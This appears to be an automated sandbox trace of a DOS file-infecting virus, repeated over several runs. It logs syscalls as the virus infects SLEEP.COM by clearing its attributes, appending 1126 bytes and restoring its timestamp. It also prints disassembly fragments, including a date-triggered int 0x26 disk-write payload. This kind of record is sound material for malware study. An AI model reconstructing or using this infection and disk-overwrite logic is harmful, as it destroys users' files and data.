2018-12-25T12:21:17.154450059Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.157775427Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.162480657Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.163587027Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.177242969Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.184465399Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.191421483Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:17.196600686Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.406895826Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.409448567Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.418925698Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.422680033Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.42569771Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.43002166Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.432453498Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.435338442Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.446265723Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.450194299Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.452341208Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.461356211Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.473400993Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.47685869Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.484673806Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.493421543Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.497183829Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.513014868Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.51605932Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.52417219Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.527638912Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.531713759Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.534846323Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.536929939Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.541227303Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.5514816Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.554225701Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.556082455Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.5673484Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.579565689Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.584313947Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.593637178Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.601858588Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.604867803Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.806880532Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.809522599Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.817607522Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.821953892Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.825125314Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.828239979Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.830538218Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.833106892Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.941020862Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.944489988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.947041996Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.956864253Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.964971339Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:17.967709003Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.970475791Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.348152838Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:17.35122257Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.35614136Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.360616595Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.361863274Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.369370876Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.376322319Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.38313152Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:17.386025794Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.414808773Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.417015548Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.42610808Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.433631345Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.43709026Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.440475542Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.442087244Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.444439348Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.454523258Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.457468594Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.459067815Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.468136032Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:17.480744909Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:17.483750652Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.491010235Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.501131243Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.502972616Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.514353942Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.517329478Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.523269095Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.525447345Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.528610172Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.531171216Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.532554267Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.534437295Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.545368421Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.548534715Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.55080343Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.561139042Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.572550553Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:17.57592805Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:17.585163242Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:17.593684803Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:17.596466109Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:17.806664919Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:17.808804125Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:17.817679985Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:17.822199497Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:17.826497885Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:17.830231352Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:17.832325612Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.835344938Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:17.941053494Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.942920914Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:17.944907438Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:17.950854618Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:17.958405084Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:17.961308954Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:17.964811114Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.560448916Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:17.563628964Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.567331945Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.571780705Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.57310589Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.586784337Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.601141097Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.609225327Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:17.612521331Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.942418207Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.944671168Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.957502473Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.961027097Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.964370905Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.968242427Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.970066474Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.972433439Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.982670414Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.986004541Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.987727012Z 62 PC: 12d11 | Close file
2018-12-25T12:21:17.997654534Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.014031573Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.021072834Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.028510491Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.036187671Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.038524489Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.050298641Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.05311889Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.061314544Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.064899595Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.068835995Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.071964054Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.075228228Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.079025345Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.089273373Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.094343441Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.096231447Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.10188162Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.115853525Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.12341788Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.131575247Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.13668985Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.138893669Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.157162678Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.15915348Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.166829918Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.171377143Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.174718711Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.178318599Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.181058794Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.183533704Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.194750857Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.198290771Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.20063686Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.211077046Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.248678051Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.252453186Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.257136318Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.766935367Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:17.770169656Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.787009347Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.791340536Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.792271019Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.799412419Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.807337877Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.814521805Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:17.822695587Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:17.941583812Z 62 PC: 12cac | Close file
2018-12-25T12:21:17.943815575Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.952271952Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:17.960063961Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.96343278Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:17.967493804Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:17.974014842Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.976580295Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:17.98721512Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:17.990288826Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:17.992346848Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.002579124Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.01450919Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.017933964Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.025425983Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.033764602Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.03619587Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.047295065Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.050317738Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.057822495Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.060972977Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.06881219Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.072218223Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.074294778Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.079684418Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.089573057Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.092586728Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.095093724Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.103902797Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.116092697Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:21:18.119180067Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.127480517Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.135032034Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.137964446Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.147073909Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.148374572Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:21:18.152891671Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:21:18.15560339Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:21:18.158293397Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:21:18.160572114Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:21:18.162602724Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.164397594Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:21:18.171722011Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.174150988Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:21:18.175509856Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:21:18.181273517Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:21:18.188928947Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:21:18.190589732Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:18.193783126Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8543,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:17.948512615Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:21:17.953960105Z 71 PC: 12b49 | Get current directory
2018-12-25T12:21:17.957601979Z 59 PC: 12b54 | Change current directory
2018-12-25T12:21:17.962540501Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:21:17.965953195Z 78 PC: 12c16 | Find first file
2018-12-25T12:21:17.980703779Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:17.985097319Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:21:17.990798903Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:21:17.992705455Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:21:18.01246251Z 62 PC: 12cac | Close file
2018-12-25T12:21:18.014687442Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:18.022391455Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:21:18.029848944Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.032857183Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:21:18.035993343Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:21:18.037441616Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.039679239Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:21:18.050111206Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:21:18.052698242Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:21:18.054462638Z 62 PC: 12d11 | Close file
2018-12-25T12:21:18.068722576Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:21:18.080584254Z 79 PC: 12c2a | Find next file
2018-12-25T12:21:18.0840467Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:21:18.092812401Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:21:18.099966054Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:21:18.102398137Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:21:18.114445459Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:21:18.11663824Z 61 PC: 12cb1 | Open file (See above)
